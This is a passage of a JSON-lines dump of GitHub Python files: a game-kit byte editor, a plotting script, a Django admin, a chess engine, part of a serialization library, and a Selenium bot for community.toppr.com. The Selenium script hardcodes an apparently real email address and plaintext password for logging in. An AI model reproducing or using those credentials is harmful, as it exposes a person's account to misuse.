tf.app.run()\n","repo_name":"GuoxianSong/SS_MultiView_face","sub_path":"Network/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20118202686","text":"import struct\nfrom .utils import common_functions, rgb_to_hex, hex_to_rgb, zero_fill_right_shift\nfrom .utils.constants import *\n\nclass Kit:\n def __init__(self, data:bytearray):\n \"\"\"\n Initializes the class from a bytearray and sets up the kit parameters\n \"\"\"\n self.data = data\n\n @property\n def font_shirt(self):\n \"\"\"\n Loads the shirt-name configuration that the kit has by default\n \"\"\"\n return OFF_ON[self.data[54]]\n\n @font_shirt.setter\n def font_shirt(self, new_value:str):\n \"\"\"\n Updates the shirt-name configuration in the kit\n \"\"\"\n if new_value not in
OFF_ON:\n raise ValueError(\"Value not allowed\")\n self.data[54] = OFF_ON.index(new_value)\n\n @property\n def font_curve(self):\n return FONT_CURVE[self.data[56]]\n\n @font_curve.setter\n def font_curve(self, new_value:int):\n \"\"\"\n Updates the name-font curve setting in the kit\n \"\"\"\n if new_value not in FONT_CURVE:\n raise ValueError(\"Value not allowed\")\n self.data[56] = FONT_CURVE.index(new_value)\n\n @property\n def front_number(self):\n \"\"\"\n Loads the front-number setting that the kit has by default\n \"\"\"\n return OFF_ON[self.data[58]]\n\n @front_number.setter\n def front_number(self, new_value:int):\n \"\"\"\n Updates the front-number setting in the kit\n \"\"\"\n if new_value not in OFF_ON:\n raise ValueError(\"Value not allowed\")\n self.data[58] = OFF_ON.index(new_value)\n\n @property\n def short_number(self):\n \"\"\"\n Loads the short-number placement that the kit has by default\n \"\"\"\n return OFF_LEFT_RIGHT[self.data[59]]\n\n @short_number.setter\n def short_number(self, new_value:int):\n \"\"\"\n Updates the short-number placement in the kit\n \"\"\"\n if new_value not in OFF_LEFT_RIGHT:\n raise ValueError(\"Value not allowed\")\n self.data[59] = OFF_LEFT_RIGHT.index(new_value)\n\n @property\n def overlay(self):\n \"\"\"\n Loads the overlay that the kit has by default\n \"\"\"\n return self.data[61]\n\n @overlay.setter\n def overlay(self, new_value:int):\n \"\"\"\n Updates the overlay in the kit\n \"\"\"\n min_value = 0\n max_value = 14\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[61] = new_value\n else:\n raise ValueError(f\"Overlay must be between {min_value} and {max_value}\")\n\n @property\n def posc_overlay_y(self):\n return self.data[63]\n\n @posc_overlay_y.setter\n def posc_overlay_y(self, new_value:int):\n \"\"\"\n Updates the overlay's y coordinate in the kit\n \"\"\"\n min_value = 0\n max_value = 10\n \n if common_functions.check_value(min_value,new_value,max_value):\n self.data[63] = new_value\n else:\n raise ValueError(f\"Overlay y coordinate must be between {min_value} and {max_value}\")\n @property\n def y_posc_num_back(self):\n \"\"\"\n Loads the back number's y coordinate\n \"\"\"\n return self.data[67]\n\n @y_posc_num_back.setter\n def y_posc_num_back(self, new_value:int):\n \"\"\"\n Updates the back number's y coordinate in the kit\n \"\"\"\n min_value = 0\n max_value = 18\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[67] = new_value\n else:\n raise ValueError(f\"Back number y coordinate must be between {min_value} and {max_value}\")\n\n @property\n def number_size_back(self):\n \"\"\"\n Loads the back number's size\n \"\"\"\n return self.data[68]\n\n @number_size_back.setter\n def number_size_back(self, new_value:int):\n \"\"\"\n Updates the back number's size in the kit\n \"\"\"\n min_value = 0\n max_value = 31\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[68] = new_value\n else:\n raise ValueError(f\"Number size must be between {min_value} and {max_value}\")\n\n @property\n def y_posc_front_num(self):\n \"\"\"\n Loads the front number's y coordinate\n \"\"\"\n return self.data[69]\n\n @y_posc_front_num.setter\n def y_posc_front_num(self, new_value:int):\n \"\"\"\n Updates the front number's y coordinate in the kit\n \"\"\"\n min_value = 0\n max_value = 29\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[69] = new_value\n else:\n raise ValueError(f\"Front number y coordinate must be between {min_value} and {max_value}\")\n\n @property\n def x_posc_front_num(self):\n \"\"\"\n Loads the front number's x coordinate\n \"\"\"\n return self.data[70]\n\n @x_posc_front_num.setter\n def x_posc_front_num(self, new_value:int):\n \"\"\"\n Updates the front number's x coordinate in the kit\n \"\"\"\n min_value = 0\n max_value = 29\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[70] = new_value\n else:\n raise ValueError(f\"Front number x coordinate must be between {min_value} and {max_value}\")\n\n @property\n def front_number_size(self):\n \"\"\"\n Loads the front number's size\n \"\"\"\n return self.data[71]\n\n @front_number_size.setter\n def front_number_size(self,
new_value:int):\n \"\"\"\n Updates the front number's size in the kit\n \"\"\"\n min_value = 0\n max_value = 22\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[71] = new_value\n else:\n raise ValueError(f\"Front number size must be between {min_value} and {max_value}\")\n\n @property\n def y_posc_short_number(self):\n \"\"\"\n Loads the short number's y coordinate\n \"\"\"\n return self.data[72]\n\n @y_posc_short_number.setter\n def y_posc_short_number(self, new_value:int):\n \"\"\"\n Updates the short number's y coordinate in the kit\n \"\"\"\n min_value = 0\n max_value = 19\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[72] = new_value\n else:\n raise ValueError(f\"Short number y coordinate must be between {min_value} and {max_value}\")\n \n @property\n def x_posc_short_number(self):\n \"\"\"\n Loads the short number's x coordinate\n \"\"\"\n return self.data[73]\n\n @x_posc_short_number.setter\n def x_posc_short_number(self, new_value:int):\n \"\"\"\n Updates the short number's x coordinate in the kit\n \"\"\"\n min_value = 0\n max_value = 25\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[73] = new_value\n else:\n raise ValueError(f\"Short number x coordinate must be between {min_value} and {max_value}\")\n\n @property\n def short_number_size(self):\n \"\"\"\n Loads the short number's size\n \"\"\"\n return self.data[74]\n\n @short_number_size.setter\n def short_number_size(self, new_value:int):\n \"\"\"\n Updates the short number's size in the kit\n \"\"\"\n min_value = 0\n max_value = 28 #18\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[74] = new_value\n else:\n raise ValueError(f\"Short number size must be between {min_value} and {max_value}\")\n\n @property\n def font_size(self):\n \"\"\"\n Loads the name-font size\n \"\"\"\n return self.data[76]\n\n @font_size.setter\n def font_size(self, new_value:int):\n \"\"\"\n Updates the name-font size in the kit\n \"\"\"\n min_value = 0\n max_value = 30\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[76] = new_value\n else:\n raise ValueError(f\"Font size must be between {min_value} and {max_value}\")\n\n @property\n def license(self):\n \"\"\"\n Reads the correct value and loads it into the self.license variable\n \"\"\"\n license = struct.unpack(\" thr:\n plt.plot([xs[i, 0], xt[j, 0]], [xs[i, 1], xt[j, 1]],\n alpha=R[i, j] / mx, **kwargs)\n\n# Points generated using : https://shinao.github.io/PathToPoints/\nv1 = pd.read_csv('brain_points - v1_cortex.csv', header=None)\npole = pd.read_csv('brain_points - temporal_pole.csv', header=None)\n\nR, sc = orthogonal_procrustes(v1.T, pole.T)\n# ot_alignment = OptimalTransportAlignment(reg=.1)\n# ot_alignment.fit(v1.T, pole.T)\n\nfig, ax = plt.subplots(figsize=(10,10))\nplt.plot(pole[0], pole[1], 'og', ms=20)\nplt.plot(v1[0], v1[1], 'og', ms=20)\n# if R has some negative coeffs, plot them too in red\nif not (R >= 0).all():\n _plot2D_samples_mat(v1.values, pole.values, -R, thr=0.1, c=[1, 0.2, 0.2])\n colors = ['blue', 'red']\n lines = [Line2D([0], [0], color=c, linewidth=2) for c in colors]\n# Then plot R positive coeffs above a threshold in blue\n_plot2D_samples_mat(v1.values, pole.values, R, thr=0.1, c=[0.2, 0.2, 1])\nplt.axis('off')\nplt.savefig('lines.png', transparent=True)","repo_name":"neurodatascience/fmralign-tutorials","sub_path":"images/logo_generation/logo.py","file_name":"logo.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"4185512964","text":"from django.contrib import admin\nfrom inventory.models import Inventory\n\n\nclass InventoryAdmin(admin.ModelAdmin):\n list_display = [\"variant\", \"available\", \"sold\"]\n search_fields = [\"variant__product__name\"]\n list_filter = [\"variant__product__category__name\"]\n
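# \"sold\" appears to be maintained by order-processing code elsewhere (an assumption; that code is not part of this file), so the admin exposes it read-only below.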
readonly_fields = [\"sold\"]\n\n\nadmin.site.register(Inventory, InventoryAdmin)\n","repo_name":"Prabin-Kumar-Baniya-NP/e-commerce-django","sub_path":"ecommerce/inventory/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23263958559","text":"class Board:\n\n def __init__(self):\n self.player_to_move = 'w'\n self.game_log = []\n self.board = {'a8': False, 'b8': False, 'c8': False, 'd8': False, 'e8': False, 'f8': False, 'g8': False, 'h8': False,\n 'a7': False, 'b7': False, 'c7': False, 'd7': False, 'e7': False, 'f7': False, 'g7': False, 'h7': False,\n 'a6': False, 'b6': False, 'c6': False, 'd6': False, 'e6': False, 'f6': False, 'g6': False, 'h6': False,\n 'a5': False, 'b5': False, 'c5': False, 'd5': False, 'e5': False, 'f5': False, 'g5': False, 'h5': False,\n 'a4': False, 'b4': False, 'c4': False, 'd4': False, 'e4': False, 'f4': False, 'g4': False, 'h4': False,\n 'a3': False, 'b3': False, 'c3': False, 'd3': False, 'e3': False, 'f3': False, 'g3': False, 'h3': False,\n 'a2': False, 'b2': False, 'c2': False, 'd2': False, 'e2': False, 'f2': False, 'g2': False, 'h2': False,\n 'a1': False, 'b1': False, 'c1': False, 'd1': False, 'e1': False, 'f1': False, 'g1': False, 'h1': False}\n\n def switch_player(self):\n if self.player_to_move == 'w':\n self.player_to_move = 'b'\n else:\n self.player_to_move = 'w'\n\n def check_if_check(self, K_square):\n for i in self.board:\n j = self.board[i]\n if j and j.kind != 'K':\n squares = Moves().arbitrary(i, self.board)\n if K_square in squares:\n return True\n elif j and j.kind == 'K' and j.colour != self.board[K_square].colour:\n squares = Moves().arbitrary(i, self.board)\n if K_square in squares:\n return True\n\n def find_pieces(self, desired_kind, desired_colour):\n squares_with_pieces = []\n for i in self.board:\n if self.board[i] and self.board[i].colour == desired_colour and self.board[i].kind == desired_kind:\n squares_with_pieces.append(i)\n return squares_with_pieces\n\n def check_for_move(self, start_square, end_square): # simulates desired move and checks for checks returns board as it was given\n temp_figure = self.board[start_square]\n if not temp_figure:\n return False\n else:\n possible_end_squares = Moves().arbitrary(start_square, self.board)\n\n if end_square not in possible_end_squares:\n return False\n else:\n target = self.board[end_square]\n self.board[start_square] = False\n self.board[end_square] = temp_figure\n king_square = self.find_pieces('K', temp_figure.colour)[0]\n if self.check_if_check(king_square):\n self.board[start_square] = temp_figure\n self.board[end_square] = target\n return False\n self.board[start_square] = temp_figure\n self.board[end_square] = target\n return True\n\n def promotion(self, desired_promotion, start_square, end_square):\n temp_figure = self.board[start_square]\n temp_figure.kind = desired_promotion\n self.board[end_square] = temp_figure\n self.board[start_square] = False\n temp_figure.move_log.append(end_square + '=' + desired_promotion)\n self.game_log.append(end_square + '=' + desired_promotion)\n self.switch_player()\n\n def castle(self, K_square, K_end_square, kind):\n if kind == 'long':\n R_square = 'a'\n R_end_square = 'd'\n move = 'O-O-O'\n else:\n R_square = 'h'\n R_end_square = 'f'\n move = 'O-O'\n if self.board[K_square].colour == 'b':\n temp_number = '8'\n else:\n temp_number = '1'\n R_square += temp_number\n R_end_square += temp_number\n self.board[K_end_square] = 
self.board[K_square]\n self.board[K_square] = False\n self.board[R_end_square] = self.board[R_square]\n self.board[R_square] = False\n self.game_log.append(move)\n self.board[K_end_square].move_log.append(move)\n self.board[R_end_square].move_log.append(move)\n self.switch_player()\n return kind.capitalize() + ' Castling'\n\n def en_passant(self, P_square, P_end_square, direction):\n if self.board[P_square].colour == 'b':\n row = '4'\n else:\n row = '5'\n temp_figure = self.board[P_square]\n taken_figure = self.board[chr(ord(P_square[0]) + int(direction)) + row]\n self.board[P_end_square] = temp_figure\n self.board[P_square] = False\n self.board[chr(ord(P_square[0]) + int(direction)) + row] = False\n if self.check_if_check((self.find_pieces('K', temp_figure.colour)[0])):\n self.board[P_square] = temp_figure\n self.board[P_end_square] = False\n self.board[chr(ord(P_square[0]) + int(direction)) + row] = taken_figure\n return False\n else:\n temp_figure.move_log.append(P_end_square)\n self.game_log.append(temp_figure.kind + P_end_square)\n self.switch_player()\n return 'En Passant'\n\n def move(self, start_square, end_square): # preforms the move + castling + promotion + en passant\n temp_figure = self.board[start_square]\n if not temp_figure:\n return False\n elif self.player_to_move != temp_figure.colour:\n return False\n# castling\n elif temp_figure.kind == 'K' and start_square == 'e1' and end_square == 'c1':\n if self.check_for_move('e1', 'd1') and self.check_for_move('e1', 'c1') and not self.check_if_check('e1'):\n return self.castle(start_square, end_square, 'long')\n elif temp_figure.kind == 'K' and start_square == 'e1' and end_square == 'g1':\n if self.check_for_move('e1', 'f1') and self.check_for_move('e1', 'g1') and not self.check_if_check('e1'):\n return self.castle(start_square, end_square, 'short')\n elif temp_figure.kind == 'K' and start_square == 'e8' and end_square == 'c8':\n if self.check_for_move('e8', 'd8') and self.check_for_move('e8', 'c8') and not self.check_if_check('e8'):\n return self.castle(start_square, end_square, 'long')\n elif temp_figure.kind == 'K' and start_square == 'e8' and end_square == 'g8':\n if self.check_for_move('e8', 'f8') and self.check_for_move('e8', 'g8') and not self.check_if_check('e8'):\n return self.castle(start_square, end_square, 'short')\n# promotion\n elif temp_figure.kind == 'P' and end_square[1] == '8' and temp_figure.colour == 'w' and self.check_for_move(start_square, end_square):\n return 'Black Promotion'\n elif temp_figure.kind == 'P' and end_square[1] == '1' and temp_figure.colour == 'b' and self.check_for_move(start_square, end_square):\n return 'White Promotion'\n# en passant\n elif temp_figure.kind == 'P' and start_square[1] == '5' and temp_figure.colour == 'w' and not self.board[end_square] and (end_square[0] == chr(ord(start_square[0]) + 1) or end_square[0] == chr(ord(start_square[0]) - 1)):\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) + 1) + '5' and len(self.board[chr(ord(start_square[0]) + 1) + '5'].move_log) == 1:\n return self.en_passant(start_square, end_square, '1')\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) - 1) + '5' and len(self.board[chr(ord(start_square[0]) - 1) + '5'].move_log) == 1:\n return self.en_passant(start_square, end_square, '-1')\n elif temp_figure.kind == 'P' and start_square[1] == '4' and temp_figure.colour == 'b' and not self.board[end_square] and (end_square[0] == chr(ord(start_square[0]) + 1) or end_square[0] == chr(ord(start_square[0]) - 1)):\n if self.game_log[-1] == 'P' + 
chr(ord(start_square[0]) + 1) + '4' and len(self.board[chr(ord(start_square[0]) + 1) + '4'].move_log) == 1:\n return self.en_passant(start_square, end_square, '1')\n if self.game_log[-1] == 'P' + chr(ord(start_square[0]) - 1) + '4' and len(self.board[chr(ord(start_square[0]) - 1) + '4'].move_log) == 1:\n return self.en_passant(start_square, end_square, '-1')\n# else\n elif self.check_for_move(start_square, end_square):\n self.board[start_square] = False\n self.board[end_square] = temp_figure\n temp_figure.move_log.append(end_square)\n self.game_log.append(temp_figure.kind + end_square)\n self.switch_player()\n return 'Move'\n else:\n return False\n\n def start_game(self):\n for i in self.board:\n self.board[i] = False\n self.board['e8'] = Piece('K', 'b', [])\n self.board['d8'] = Piece('Q', 'b', [])\n self.board['f8'] = Piece('B', 'b', [])\n self.board['c8'] = Piece('B', 'b', [])\n self.board['g8'] = Piece('N', 'b', [])\n self.board['b8'] = Piece('N', 'b', [])\n self.board['h8'] = Piece('R', 'b', [])\n self.board['a8'] = Piece('R', 'b', [])\n self.board['a7'] = Piece('P', 'b', [])\n self.board['b7'] = Piece('P', 'b', [])\n self.board['c7'] = Piece('P', 'b', [])\n self.board['d7'] = Piece('P', 'b', [])\n self.board['e7'] = Piece('P', 'b', [])\n self.board['f7'] = Piece('P', 'b', [])\n self.board['g7'] = Piece('P', 'b', [])\n self.board['h7'] = Piece('P', 'b', [])\n\n self.board['e1'] = Piece('K', 'w', [])\n self.board['d1'] = Piece('Q', 'w', [])\n self.board['f1'] = Piece('B', 'w', [])\n self.board['c1'] = Piece('B', 'w', [])\n self.board['g1'] = Piece('N', 'w', [])\n self.board['b1'] = Piece('N', 'w', [])\n self.board['h1'] = Piece('R', 'w', [])\n self.board['a1'] = Piece('R', 'w', [])\n self.board['a2'] = Piece('P', 'w', [])\n self.board['b2'] = Piece('P', 'w', [])\n self.board['c2'] = Piece('P', 'w', [])\n self.board['d2'] = Piece('P', 'w', [])\n self.board['e2'] = Piece('P', 'w', [])\n self.board['f2'] = Piece('P', 'w', [])\n self.board['g2'] = Piece('P', 'w', [])\n self.board['h2'] = Piece('P', 'w', [])\n self.game_log = []\n self.player_to_move = 'w'\n\n\nclass Moves:\n\n def is_on_playboard(self, square):\n if 0 < ord(square[0]) - 96 < 9 and 0 < int(square[1:]) < 9:\n return True\n else:\n return False\n\n def arbitrary(self, test_square, playboard):\n temp_figure = playboard[test_square]\n if temp_figure:\n if temp_figure.kind == 'K':\n return Moves().K(test_square, playboard)\n elif temp_figure.kind == 'Q':\n return Moves().Q(test_square, playboard)\n elif temp_figure.kind == 'R':\n return Moves().R(test_square, playboard)\n elif temp_figure.kind == 'B':\n return Moves().B(test_square, playboard)\n elif temp_figure.kind == 'N':\n return Moves().N(test_square, playboard)\n elif temp_figure.kind == 'P':\n return Moves().P(test_square, playboard)\n\n def check_if_ok(self, square, test_square, playboard): # does not check if given square is inside playboard\n if not playboard[square]:\n return 1\n elif playboard[square].colour != playboard[test_square].colour:\n return 2\n elif playboard[square].colour == playboard[test_square].colour:\n return 3\n\n def straight_move(self, square, direction, sign, playboard):\n if direction == 'horizontal':\n letter_coef = sign\n number_coef = 0\n else:\n letter_coef = 0\n number_coef = sign\n i = 1\n possible_squares = []\n while self.is_on_playboard(chr(ord(square[0]) + i * letter_coef) + str(int(square[1]) + i * number_coef)):\n temp_square = chr(ord(square[0]) + i * letter_coef) + str(int(square[1]) + i * number_coef)\n if 
self.check_if_ok(temp_square, square, playboard) == 1:\n possible_squares.append(temp_square)\n i += 1\n elif self.check_if_ok(temp_square, square, playboard) == 2:\n possible_squares.append(temp_square)\n break\n else:\n break\n return possible_squares\n\n def diagonal_move(self, square, vertical_sign, horizontal_sign, playboard):\n possible_squares = []\n i = 1\n while self.is_on_playboard(chr(ord(square[0]) + i * horizontal_sign) + str(int(square[1]) + i * vertical_sign)):\n temp_square = chr(ord(square[0]) + i * horizontal_sign) + str(int(square[1]) + i * vertical_sign)\n if self.check_if_ok(temp_square, square, playboard) == 1:\n possible_squares.append(temp_square)\n i += 1\n elif self.check_if_ok(temp_square, square, playboard) == 2:\n possible_squares.append(temp_square)\n break\n else:\n break\n return possible_squares\n\n def K(self, test_square, playboard):\n possible_squares = []\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n temp_square = chr(ord(test_square[0]) + j) + str(int(test_square[1]) + i)\n if self.is_on_playboard(temp_square) and self.check_if_ok(temp_square, test_square, playboard) in [1, 2]:\n possible_squares.append(temp_square)\n\n if playboard[test_square].move_log == []: # for check_for_move to work - castling\n if playboard[test_square].colour == 'w':\n if playboard['a1'] and playboard['a1'].kind == 'R' and playboard['a1'].move_log == [] and not playboard['b1'] and not playboard['c1'] and not playboard['d1']:\n possible_squares.append('c1')\n if playboard['h1'] and playboard['h1'].kind == 'R' and playboard['h1'].move_log == [] and not playboard['f1'] and not playboard['g1']:\n possible_squares.append('g1')\n if playboard[test_square].colour == 'b':\n if playboard['a8'] and playboard['a8'].kind == 'R' and playboard['a8'].move_log == [] and not playboard['b8'] and not playboard['c8'] and not playboard['d8']:\n possible_squares.append('c8')\n if playboard['h8'] and playboard['h8'].kind == 'R' and playboard['h8'].move_log == [] and not playboard['f8'] and not playboard['g8']:\n possible_squares.append('g8')\n\n return possible_squares\n\n def Q(self, test_square, playboard):\n return self.R(test_square, playboard) + self.B(test_square, playboard)\n\n def R(self, test_square, playboard):\n possible_squares = self.straight_move(test_square, 'horizontal', 1, playboard)\n possible_squares += self.straight_move(test_square, 'horizontal', -1, playboard)\n possible_squares += self.straight_move(test_square, 'vertical', 1, playboard)\n possible_squares += self.straight_move(test_square, 'vertical', -1, playboard)\n return possible_squares\n\n def B(self, test_square, playboard):\n possible_squares = self.diagonal_move(test_square, 1, 1, playboard)\n possible_squares += self.diagonal_move(test_square, 1, -1, playboard)\n possible_squares += self.diagonal_move(test_square, -1, -1, playboard)\n possible_squares += self.diagonal_move(test_square, -1, 1, playboard)\n return possible_squares\n\n def N(self, test_square, playboard):\n possible_squares = []\n\n for i in [-2, 2]:\n for j in [-1, 1]:\n temp_square1 = chr(ord(test_square[0]) + i) + str(int(test_square[1]) + j)\n temp_square2 = chr(ord(test_square[0]) + j) + str(int(test_square[1]) + i)\n if self.is_on_playboard(temp_square1) and temp_square1 != test_square:\n if self.check_if_ok(temp_square1, test_square, playboard) in [1, 2]:\n possible_squares.append(temp_square1)\n if self.is_on_playboard(temp_square2) and temp_square2 != test_square:\n if self.check_if_ok(temp_square2, test_square, playboard) in [1, 2]:\n 
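# check_if_ok (defined above) returns 1 for an empty square and 2 for an enemy piece, both legal knight targets; same-colour pieces return 3 and are skipped.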
possible_squares.append(temp_square2)\n return possible_squares\n\n def P(self, test_square, playboard): # en passant and promotion entirely carried out in move\n possible_squares = []\n if playboard[test_square].colour == 'w':\n coef = 1\n start_line = '2'\n else:\n coef = -1\n start_line = '7'\n temp_square1 = test_square[0] + str(int(test_square[1]) + 1 * coef)\n temp_square2 = test_square[0] + str(int(test_square[1]) + 2 * coef)\n if self.is_on_playboard(temp_square1) and not playboard[temp_square1]:\n possible_squares.append(temp_square1)\n if self.is_on_playboard(temp_square2) and test_square[1] == start_line and not playboard[temp_square2] and not playboard[temp_square1]:\n possible_squares.append(temp_square2)\n for i in [1, -1]:\n temp_square = chr(ord(test_square[0]) + i) + str(int(test_square[1]) + 1 * coef)\n if self.is_on_playboard(temp_square) and playboard[temp_square] and playboard[temp_square].colour != playboard[test_square].colour:\n possible_squares.append(temp_square)\n return possible_squares\n\n\nclass Piece:\n\n def __init__(self, kind, colour, possible_squares):\n self.kind = kind\n self.colour = colour\n self.possible_squares = possible_squares\n self.move_log = []\n\n def encode(self): # utf-8 html for piece (missing &# needed)\n i = 0\n if self.kind == 'K':\n i += 12\n elif self.kind == 'Q':\n i += 13\n elif self.kind == 'R':\n i += 14\n elif self.kind == 'B':\n i += 15\n elif self.kind == 'N':\n i += 16\n elif self.kind == 'P':\n i += 17\n if self.colour == 'b':\n i += 6\n\n return int('98' + str(i))\n","repo_name":"grlj/UVP_chess","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":18202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26675411177","text":"def get_doubt(take_up_xpath):\n # Wait for the take-up button, click it, then wait for the next one.\n # The original version recursed unconditionally from a ``finally`` block,\n # which guarantees an eventual RecursionError; a plain loop does the same\n # job safely.\n while True:\n element = WebDriverWait(browser, 10000000).until(\n EC.presence_of_element_located((By.XPATH, take_up_xpath))\n )\n element.click()\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nbrowser = webdriver.Chrome('/home/amarjeet-pc/Downloads/chromedriver_linux64/chromedriver')\nbrowser.get('https://community.toppr.com/')\nbrowser.maximize_window()\nbrowser.implicitly_wait(10)\nelem1 = browser.find_element_by_xpath(xpath='//*[@id=\"app\"]/div/div/div[1]/div/div[1]/div[2]/button[1]')\nelem1.click()\nbrowser.implicitly_wait(2)\nelem2 = browser.find_element_by_id('email-login')\nelem3 = browser.find_element_by_id('password-login')\nelem2.send_keys('amarjeet.ans.sinha@gmail.com')\nelem3.send_keys('ansu2678')\nelem4 = browser.find_element_by_xpath('//*[@id=\"login_modal_form\"]/button[2]')\nelem4.click()\nelem5 = browser.find_element_by_xpath('//*[@id=\"index-headjs-page\"]/body/div[5]/div/div[2]/div[4]/div/div[5]/a')\nelem5.click()\nhandles = browser.window_handles\nparent_handle = browser.current_window_handle\nfor handle in handles:\n if parent_handle != handle:\n browser.switch_to.window(handle)\n\ntake_up_xpath =
'//*[@id=\"root\"]/div/div[2]/div[2]/div[2]/div/div/div[2]/div/div[3]/div[2]/button'\n\nget_doubt(take_up_xpath)\n","repo_name":"Amarjeet2629/MyPycharmProjects","sub_path":"toppr/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17419643156","text":"from collections import defaultdict\n\nfrom .exception import FieldError, FieldInvalid, FieldOptsError\nfrom .utils import set_creation_order\nfrom .pipelines import (\n StringMarshalPipeline, StringSerializePipeline,\n StaticSerializePipeline,\n IntegerMarshalPipeline, IntegerSerializePipeline,\n NestedMarshalPipeline, NestedSerializePipeline,\n CollectionMarshalPipeline, CollectionSerializePipeline,\n BooleanMarshalPipeline, BooleanSerializePipeline,\n DateTimeSerializePipeline, DateTimeMarshalPipeline,\n DateMarshalPipeline, DateSerializePipeline,\n DecimalSerializePipeline, DecimalMarshalPipeline,\n FloatSerializePipeline, FloatMarshalPipeline)\nfrom .pipelines.base import run_pipeline, Session\nfrom .pipelines.marshaling import MarshalPipeline\nfrom .pipelines.serialization import SerializePipeline\n\nDEFAULT_ERROR_MSGS = {\n 'required': 'This is a required field',\n 'type_error': 'Invalid type',\n 'not_found': '{name} not found',\n 'none_not_allowed': 'This field cannot be null',\n 'invalid_choice': 'invalid choice',\n 'duplicates': 'duplicates found',\n 'out_of_bounds': 'value out of allowed range',\n}\n\n\nclass FieldOpts(object):\n \"\"\"FieldOpts are used to provide configuration options to :class:`.Field`.\n They are designed to allow users to easily provide custom configuration\n options to :class:`.Field` classes.\n\n Custom :class:`.FieldOpts` classes are set on :class:`.Field` using the\n ``opts_class`` property.\n\n .. code-block:: python\n\n class MyFieldOpts(FieldOpts):\n\n def __init__(self, **opts):\n\n self.some_property = opts.get('some_property', None)\n super(MyFieldOpts, self).__init__(**opts)\n\n .. seealso::\n :class:`.Field`\n \"\"\"\n\n extra_error_msgs = {}\n\n def __init__(self, **opts):\n \"\"\" Construct a new instance of :class:`FieldOpts`\n and set config options\n\n :param name: Specify the name of the field for data output\n :param required: This field must be present when marshaling\n :param attribute_name: Specify internal name for this field, set on\n mapper.fields dict\n :param source: Specify the name of the attribute on the object to use\n when getting/setting data. May be ``__self__`` to use entire mapper\n object as data\n :param default: Specify a default value for this field to apply when\n serializing or marshaling\n :param allow_none: This option only takes affect if required=False. If\n allow_none=False and required=False, then Kim will accept either\n the field being missing completely from the data, or the field\n being passed with a non-None value. That is, either ``{}`` or\n ``{'field': 'value'}`` but never ``{'field': None}``. 
Default True.\n :param read_only: Specify if this field should be ignored when marshaling\n :param error_msgs: A dict of error_type: error messages.\n :param null_default: Specify the default type to return when a field is\n null IE None or {} or ''\n :param choices: Specify a list of valid values\n :param extra_serialize_pipes: dict of lists containing extra Pipe functions\n to be run at the end of each stage when serializing.\n eg ``{'output': [my_pipe, my_other_pipe]}```\n :param extra_marshal_pipes: dict of lists containing extra Pipe functions\n to be run at the end of each stage when marshaling.\n eg ``{'validate': [my_pipe, my_other_pipe]}```\n\n :raises: :class:`.FieldOptsError`\n :returns: None\n \"\"\"\n\n self._opts = opts.copy()\n\n # internal attrs\n self._is_wrapped = opts.pop('_is_wrapped', False)\n\n # set attribute_name, name and source options.\n name = opts.pop('name', None)\n attribute_name = opts.pop('attribute_name', None)\n source = opts.pop('source', None)\n\n self.name, self.attribute_name, self.source = None, None, None\n\n self.set_name(name=name, attribute_name=attribute_name, source=source)\n\n self.error_msgs = DEFAULT_ERROR_MSGS.copy()\n self.error_msgs.update(opts.pop('error_msgs', self.extra_error_msgs))\n\n self.required = opts.pop('required', True)\n self.default = opts.pop('default', None)\n self.null_default = opts.pop('null_default', None)\n\n self.allow_none = opts.pop('allow_none', True)\n self.read_only = opts.pop('read_only', False)\n self.choices = opts.pop('choices', None)\n\n self.extra_marshal_pipes = \\\n opts.pop('extra_marshal_pipes', defaultdict(list))\n self.extra_serialize_pipes = \\\n opts.pop('extra_serialize_pipes', defaultdict(list))\n\n self.validate()\n\n def validate(self):\n \"\"\"Allow users to perform checks for required config options. Concrete\n classes should raise :class:`.FieldError` when invalid configuration\n is encountered.\n\n A slightly contrived example is requiring all fields to be\n ``read_only=True``\n\n Usage::\n\n from kim.field import FieldOpts\n\n class MyOpts(FieldOpts):\n\n def validate(self):\n\n if self.read_only is True:\n raise FieldOptsError('Field cannot be read only')\n\n\n :raises: `.FieldOptsError`\n :returns: None\n \"\"\"\n pass\n\n def set_name(self, name=None, attribute_name=None, source=None):\n \"\"\"Programmatically set the name properties for a field.\n\n Names cascade from each other unless they are explicitly overridden.\n\n Example 1:\n class MyMapper(Mapper):\n foo = field.String()\n\n attribute_name = foo\n name = foo\n source = foo\n\n Example 2:\n class MyMapper(Mapper):\n foo = field.String(name='bar', source='baz')\n\n attribute_name = foo\n name = bar\n source = baz\n\n :param name: value of name property\n :param attribute_name: value of attribute_name property\n :param source: value of source property\n\n :returns: None\n \"\"\"\n self.attribute_name = self.attribute_name or attribute_name\n self.name = self.name or name or self.attribute_name\n self.source = self.source or source or self.name\n\n def get_name(self):\n \"\"\"Return the name property set by :meth:`set_name`\n\n :rtype: str\n :returns: the name of the field to be used in input/output\n \"\"\"\n\n return self.name\n\n\nclass 